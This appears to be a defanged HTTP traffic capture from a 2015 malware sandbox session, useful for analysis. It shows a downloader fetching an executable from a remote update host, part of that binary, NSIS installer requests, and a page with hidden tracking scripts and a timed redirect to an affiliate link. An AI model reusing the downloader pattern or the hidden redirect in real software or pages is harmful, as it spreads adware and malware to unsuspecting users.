User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s95.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 9941
Connection: keep-alive
Date: Sat, 25 Jul 2015 19:10:25 GMT
Last-Modified: Sat, 25 Jul 2015 19:10:25 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache42.l2de1[0,200-0,H], cache39.l2de1[0,0], cache1.de1[0,200-0,M], cache7.de1[1,0]
Age: 209
X-Cache: MISS TCP_REFRESH_MISS dirn:5:301629542
X-Swift-SaveTime: Sat, 25 Jul 2015 19:13:54 GMT
X-Swift-CacheTime: 5191
(function(){function k(){this.c="1255080332";this.R="z";this.N="";this.K="";this.M="";this.r="1437851425";this.P="oz.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1255080332");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),this.ga(),.this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.pa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},na:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},pa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[object
<<< skipped >>>
GET /stat.htm?id=1255080411&r=&lg=en-us&ntime=none&cnzz_eid=308424489-1437851639-&showp=1916x902&t=&h=1&rnd=1536579831 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.91debug.com/ad.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: oz.cnzz.com
Connection: Keep-Alive
Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh
HTTP/1.1 200 OK
Server: Tengine/1.4.6
Date: Sat, 25 Jul 2015 19:14:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /files/069.exe HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: update.zchon.net
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/octet-stream
Content-Length: 1572040
Connection: close
Set-Cookie: _alicdn_tc=AQAAADrKp2Sz3AgAvRA5Jf/4Jv/7VkFd; Path=/; Expires=Sat, 25-Jul-15 20:14:30 GMT; HttpOnly
Last-Modified: Fri, 24 Jul 2015 09:10:57 GMT
Accept-Ranges: bytes
ETag: "806680a6f0c5d01:27a"
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:13:53 GMT
Via: cache10.l2et2-1[0,304-0,H], cache13.l2et2-1[0,0], kunlun9.cn125[0,200-0,H], kunlun8.cn125[1,0]
Cache-Control: max-age=30
Expires: Sat, 25 Jul 2015 13:57:15 GMT
Age: 37
X-Cache: HIT TCP_MEM_HIT dirn:8:115796088
X-Swift-SaveTime: Sat, 25 Jul 2015 19:14:14 GMT
X-Swift-CacheTime: 30
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@.................................}o.......................................s......................8................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /stat.php?id=1254485011 HTTP/1.1
Accept: */*
Referer: hXXp://61.196.186.155:73/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s11.cnzz.com
Connection: Keep-Alive
Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sat, 25 Jul 2015 19:14:31 GMT
Last-Modified: Sat, 25 Jul 2015 19:14:31 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache44.l2de1[301,200-0,M], cache54.l2de1[302,0], cache6.de1[301,200-0,M], cache6.de1[303,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:3:926114469
X-Swift-SaveTime: Sat, 25 Jul 2015 19:14:31 GMT
X-Swift-CacheTime: 5400
4aa..(function(){function k(){this.c="1254485011";this.R="z";this.N="";this.K="";this.M="";this.r="1437851671";this.P="oz.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1254485011");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),this.ga(),.this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.pa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},na:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var ..222b..c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},pa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.
<<< skipped >>>
GET /9.gif?abc=1&rnd=1346578631 HTTP/1.1
Accept: */*
Referer: hXXp://tj.sui17.com/will.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive
HTTP/1.1 302 Found
Server: Tengine
Date: Sat, 25 Jul 2015 19:13:57 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh; expires=Tue, 22-Jul-25 19:13:57 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=784a5f35; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=b0e8242fc5c40545677b304e_1437851637; expires=Tue, 22-Jul-25 19:13:57 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=9c06DvdL 1kCASU5EL1qJWYh
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server: Tengine..Date: Sat, 25 Jul 2015 19:13:57 GMT..Content-Type: image/gif..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh; expires=Tue, 22-Jul-25 19:13:57 GMT; path=/; domain=.mmstat.com..Set-Cookie: sca=784a5f35; path=/; domain=.cnzz.mmstat.com..Set-Cookie: atpsida=b0e8242fc5c40545677b304e_1437851637; expires=Tue, 22-Jul-25 19:13:57 GMT; path=/; domain=.cnzz.mmstat.com..Location: http://pcookie.cnzz.com/app.gif?&cna=9c06DvdL 1kCASU5EL1qJWYh..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cache..GIF89a.............!.......,...........L..;..
GET /core.php?web_id=1255080411&t=z HTTP/1.1
Accept: */*
Referer: hXXp://VVV.91debug.com/ad.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sat, 25 Jul 2015 19:14:00 GMT
Last-Modified: Sat, 25 Jul 2015 19:14:00 GMT
Expires: Sat, 25 Jul 2015 19:29:00 GMT
Via: cache19.l2de1[617,200-0,M], cache19.l2de1[617,0], cache2.nl1[624,200-0,M], cache7.nl1[625,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:0:707413897
X-Swift-SaveTime: Sat, 25 Jul 2015 19:14:01 GMT
X-Swift-CacheTime: 899
2fc..!function(){var p,q,r,a=encodeURIComponent,b="1255080411",c="",d="",e="online_v3.php",f="z11.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k["callRequest"]([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k["createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k["createIcon"]([p])))}();..0..
GET /ad.htm HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: jc.110160.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 757
Content-Type: text/html
Last-Modified: Thu, 14 May 2015 08:58:36 GMT
Accept-Ranges: bytes
ETag: "84468729248ed01:6a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:15:53 GMT
<html>..<body>.. <div style="display: none"> ..<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17745949.js"></script>..<noscript><a href="hXXp://VVV.51.la/?17745949" target="_blank"><img alt="我要啦免费统计" src="hXXp://img.users.51.la/17745949.asp" style="border:none" /></a></noscript>..</div>.. <script language="javascript" type="text/javascript">.. setTimeout("location.href='hXXp://s.click.taobao.com/t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV';", 100);.. </script>..</body>..</html>..HTTP/1.1 200 OK..Content-Length: 757..Content-Type: text/html..Last-Modified: Thu, 14 May 2015 08:58:36 GMT..Accept-Ranges: bytes..ETag: "84468729248ed01:6a3"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Sat, 25 Jul 2015 19:15:53 GMT..<html>..<body>.. <div style="display: none"> ..<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17745949.js"></script>..<noscript><a href="hXXp://VVV.51.la/?17745949" target="_blank"><img alt="我要啦免费统计" src="hXXp://img.users.51.la/17745949.asp" style="border:none" /></a></noscript>..</div>..
<<< skipped >>>
GET /img/click/dot.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.feitian001.com/html/click/7191_653.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img.feitian001.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Wed, 05 Aug 2015 19:14:14 GMT
Date: Mon, 06 Jul 2015 19:14:14 GMT
Server: nginx
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 14 Dec 2009 11:48:24 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 kf48:3 (Cdn Cache Server V2.0)
Connection: keep-alive
GIF89a.............!.......,............Q.;HTTP/1.1 200 OK..Expires: Wed, 05 Aug 2015 19:14:14 GMT..Date: Mon, 06 Jul 2015 19:14:14 GMT..Server: nginx..Content-Type: image/gif..Content-Length: 43..Last-Modified: Mon, 14 Dec 2009 11:48:24 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..Age: 1..X-Via: 1.1 kf48:3 (Cdn Cache Server V2.0)..Connection: keep-alive..GIF89a.............!.......,............Q.;..
GET /play/fxappimg/btn/tab3.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=172800
Content-Type: image/png
Last-Modified: Mon, 01 Dec 2014 12:08:00 GMT
Accept-Ranges: bytes
ETag: "4d3aa735fdd01:0"
Server: Microsoft-IIS/7.5
Date: Sat, 25 Jul 2015 19:14:18 GMT
Content-Length: 12235
.PNG........IHDR...`...T........C....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:F9757A3FF07C11E3B9F38277EE41A726" xmpMM:DocumentID="xmp.did:F9757A40F07C11E3B9F38277EE41A726"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F9757A3DF07C11E3B9F38277EE41A726" stRef:documentID="xmp.did:F9757A3EF07C11E3B9F38277EE41A726"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>u6>...,AIDATx..}..eGy^.}.}....Y.$"Y...0.A.v.'^....dk.(XU...e.A"..L*.8.Fc...v.....$.......J......Hveq**.9.e.7..{O.9.....r.{...T.Jo...O.w.........Y...w...0g..=.3. .7.t|.|.`..m*..g........D..D..D..{...}`..=#.._.S.L=....H.%...c.......).X...... .%.....7h.>p..g.......w.........o..o?..A...t....f...yQ}.....5t....j..o..gb..hy........l. ..(....*.../.....>..|..W./$....P.u4.P./i.......k...........p.?-SP..Pj..@.X1@......n.g../..!.:.....[-.......%x .'.....=........m....w-.3#.T.:P33...2R0)n'O....ysm.u4........G........|.p.........8q..7......6... ...............t.`.<.. .b..e5...^.F_T.3.,.U.w[..^...
<<< skipped >>>
GET /swfs/85/26497cqjd1420150506/btn.gif HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 19:32:27 GMT
Date: Sat, 25 Jul 2015 18:32:27 GMT
Server: nginx/0.8.54
Content-Type: image/gif
Content-Length: 7039
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou187:80 (Cdn Cache Server V2.0), 1.1 kf50:5 (Cdn Cache Server V2.0)
Connection: keep-alive
GIF89a..2......W.oS........G.F...X.......B......R..8.\.....=.&..........*..{...........E..........I:........;....<.........j..1..&.kT.sY..u..d.u.....R.G......t.....U...........M...F..c...X..~n]y....r..l.................x.....`....w..x......C./&....:.2.....h....7.J...1.G......k.g..G8.......i...e..j........Y.l.....a..1&.....h..d...../..q(...xh...........N..m.c.....ZG<.......F..l........!......wF6.~N.d.E..l6*.....|.....y..S....YE.[.........|.j.....m...`..w..}.....Y.WD.<.....j...............I..k...........x..~..a'....$.R..W....._...5..s..,.......S.l%...C!....{.....#..u....M..t......!.6..@...u..1...3.......{..w..x.e.Z....'.....n.f......S.{....e....v.....`...v...L......sN...h... ....G..2.._.......^$.......O........................~.....v?4.................._......j..p..h.7....!.......,......2.......ds.......|.....O..!x*"....^....C......p....?Vt.......>.h....5Q..9qa.."..l(4!B...B0.....f..;2`..oT.....^.aL....n.......`..../6.3c.]./n..=K#...p........d..U.6.[.t.Fu..F..i.~..Br..G.M.p$.&...Hc.....l^|1....Z...,...1b..1.....b........wl.?...9............#..F>......B.n...'..#dH...Z.w..W..Q..|...IAp.B.. B......}D....Vh.....!..l... .8.*}`....^x...F....:.........}..;......T.c-}0R...l...L.....\.E.TJ9..ONY..U6...`....Uf.%.c..e.M..H...)..>n..7...#!..(..ABh..~.j......#...(.~..(.p8.h.......r.(.~d.)...j).~..i.JV.f..~.!.>....?...D#.d ....Y....`...&..-...D..4#m. .....6.........*{m3.l.-..B.m0`..m........YK."..A-.<q`......B|Q..}h...p.....G,q5*T.N:.W\1.``...r."...\...)t|..,..q:).|.....B3*.P2.'..3...,1.......|!....`..8
<<< skipped >>>
GET /swfs/85/26497cqjd1420150506/ren1.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/index.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 19:33:11 GMT
Date: Sat, 25 Jul 2015 18:33:11 GMT
Server: nginx/1.3.3
Content-Type: application/x-shockwave-flash
Content-Length: 50896
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
ETag: "5549ca3e-c6d0"
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 zhenjiang79:8111 (Cdn Cache Server V2.0), 1.1 kf49:5 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.....x...eT\M...........w......w......w..H.ww.n.....{............>g....;..].kV..T...j.Yc.........-.......LL....w .1MYy........$.`...&.......#...n..'**.......u......i...... ...A............G6.p...d`.'.......xp.[.ZXs[.:......q.....S..q.6.tu.vuu.B....;.{....]m.=<.....2ZBp.......\P.O..?[...Z..I...=...........{ & .. "...7..h..T.........0......................5..<....=.ZY..k....../ K.k'kgk.O.;....^ K1.WwgsO)s77'{K.?.<.\.v...>...\6.\-.........LE..<...<........?k{h..Y.hZ{.z.[Z..3..0**b..........Rw....Vb.."...H.AQi.9A>>..,RT@ZNN.......|..M..&.j...o.D...@........m..(._...H...!y................J.....Yp3w....)I.............&..9Yaa.~A..]......Y.O......................Mi..n.Rp@.|{wa............n..J..........].d."|"Zj|...,<,.T....,<Bbw..>.5.}^~~~..K....>....?......_.w.....................3/.....!^jZRf!qq.?..".xyy..$...B.B.......`....#.....@h0.. @y.I0.]G...C.....$.........A.A.T.....!D|.H.s(:....>2F~..I...3..M-..TR&...;s2............U...r....Y.........x.l....b...x..?..q.:....A Z6..DGc.................l.5/....j"f:s.../..3......:.#.......FxjL$.0.a....!..S...s...h.G.{GZ.....1.....ua...2NR.J.S4D.2.X.......x.......]....e.MW3[..6..y.....N..*1`!d..;.j.tJ....B3.d2...U......y.N...5.' .3M...rQ...M.................Y.L,.ri'u^0l....8....0...=...C...1...cu.C....[......ig...x.....-ZM....hU...x.KH..1..tde!........R..'e.#".0...~}.K..'q.s.8..;7..Q...)..[....yq.."..M..D.......*.h!.8.i....wA..2..A.9.A.......@;.......jC....&}.^|4..<.dS.......w%..L.....9h9...Y ....O8.\.........:p.y=J......._..w..9....V
<<< skipped >>>
GET /swfs/85/26497cqjd1420150506/ren2.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/index.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 20:08:32 GMT
Date: Sat, 25 Jul 2015 19:08:32 GMT
Server: nginx/1.3.3
Content-Type: application/x-shockwave-flash
Content-Length: 293255
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
ETag: "5549ca3e-47987"
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou186:8107 (Cdn Cache Server V2.0), 1.1 kf48:4 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.....x..|.<.k......YZm.h...9....v...."V...N.....%"f. Hk.E.Q....=b.7.s..<........~.."\.5..o|.k........0y....p..q........%.{...7..y!.....W........`OOO1OI1...X\^^.|E.,!!.h!....n.%..v._..W..6n..pgw8.............;......Nnb...V6b.H.....,.v....h.p........D:.\.muN......;.H[.77......z2.D.Y.....I.. ..c........H\...."!*../.. .. )..".p..?....[W-.w.{.....,!. ...............V.?[.S...K.{..g...:.\.....5....a....0..W...V.E.",.U,........`/Q..Hk.OK..Q.]S ..l._.......;.......]....[..{;..um..(Wk.F....FKK....n.dm....(....)H..........&.&%.~U..Uy.kjj...&K\.j........5j.n....O..S.?...p;8...A..rMB\...)..G...?d.q.{..SwE".z.....f.R....j.L_........"....h.. .....h....~.q.....N..4..AP..p.ygg..a1...s...'..w.~=8B...;h.d.Z...,gd....Cu.oN...a.J.vv....I....#..I......_E....~......o.....>. ...s.HG..2..[F.r............5..N..............".....F.l...K|@}PA.B.......?.....Xi.....-...0~9...?..............g..9...p.p...,.....>&&.ON]..ff.....k ......S.....O.._.......*N...W.}....Q.....n...qh.n ..8...o.6.q...../....8...........7.eP.I.k%n...D.w......y.v........@.S....}..`._$..?9NF.?A./ax...A......u..#.0,..1...13..x..a.....0D?.......s._.../.Q._...........C.C.p.`:.x......^...*....c...9>......y.W0W$..p.q..q.....3......{..?...~..mO.2...t.b....[...Y..w>......iJ.O>=..O.w)...>.Q.0q............G ~..WD....4......4OwIs.w......._v.9.../?V.x..!. c..0.e0..o..c.....9................7..K...]...m..%a.o.i..~.......DQa.#..O.Qs.~..lE.X...x?V.s...l..K%f.............:GM....7F|0..........8..q3..i.3p\C....>"L.s.......r...r.....;...'/.........y~..YEE.....
<<< skipped >>>
GET /f/track.php?step=2 HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cp.gs307.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sat, 25 Jul 2015 19:14:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.14
0..HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Sat, 25 Jul 2015 19:14:04 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.14..0......
GET /f/track.php?step=2&ext= HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cp.gs307.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sat, 25 Jul 2015 19:14:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.14
0..HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Sat, 25 Jul 2015 19:14:05 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.14..0..
GET /img/30015.jpg?t=141611 HTTP/1.0
Host: image.juezhao123.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sat, 25 Jul 2015 19:10:53 GMT
Content-Type: image/jpeg
Content-Length: 243
Last-Modified: Fri, 05 Jun 2015 06:15:32 GMT
Connection: close
Accept-Ranges: bytes
[Settings]..iconindex=1..pos=..width=550..height=400..border=10..tooltip=0..titleheight=50..trayiconindex=0..showstatus=0..transparent=10%..newwidth=0..newheight=0..anote=100..noteupdateservice=1..menucolor=2..sand=65000..float=1..order=desc....
GET /t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.click.taobao.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: Tengine
Date: Sat, 25 Jul 2015 19:14:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
